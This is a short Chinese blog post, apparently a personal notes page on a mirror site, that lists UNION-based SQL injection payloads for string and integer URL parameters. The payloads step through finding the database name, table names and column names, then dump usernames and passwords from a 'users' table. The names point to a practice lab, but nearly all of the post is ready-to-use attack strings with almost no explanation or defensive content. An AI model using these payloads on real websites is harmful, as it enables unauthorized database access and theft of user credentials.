zoukankan      html  css  js  c++  java
  • sql注入

    一 、字符型(需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=' union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA where '1'='1
    
    ?id=' union select 1,2,database()-- 随便     --后面有个空格再随便输个字母
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库
    【2】查security库的表名

    ?id=' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'--+
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=' union select 1,group_concat(username),group_concat(password) from security.users--+
    

    二、整型(不需要闭合特意去 ' ' )

    【1】查当前库名

    ?id=0 union select 1,group_concat(schema_name),2 from information_schema.SCHEMATA
    
    ?id=0 union select 1,2,database()
    

    。。。。。。。。。。。。。。。。。。。。假设返回库名为security库

    【2】查security库的表名

    ?id=0 union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回表名为users

    【3】查security库users表的列名

    ?id=0 union select 1,group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='security'
    

    。。。。。。。。。。。。。。。。。。。。假设返回username,password

    【4】查security库 users表的各列里面的字段

    ?id=0 union select 1,group_concat(username),group_concat(password) from security.users
    

    持续更新。。。。。。。。。。

  • 相关阅读:
    windows下安装pip教程
    python安装扩展”unable to find vcvarsall.bat“的解决办法
    minggw 安装
    Python-- easy_install 的安装
    python 处理中文遇到的编码问题总结 以及 字符str的编码如何判断
    python中的三个读read(),readline()和readlines()
    同时读取两个文件进行while循环
    python 类实例化,修改属性值
    Python if-elif-else
    python 元组
  • 原文地址:https://www.cnblogs.com/WTa0/p/11810830.html
Copyright © 2011-2022 走看看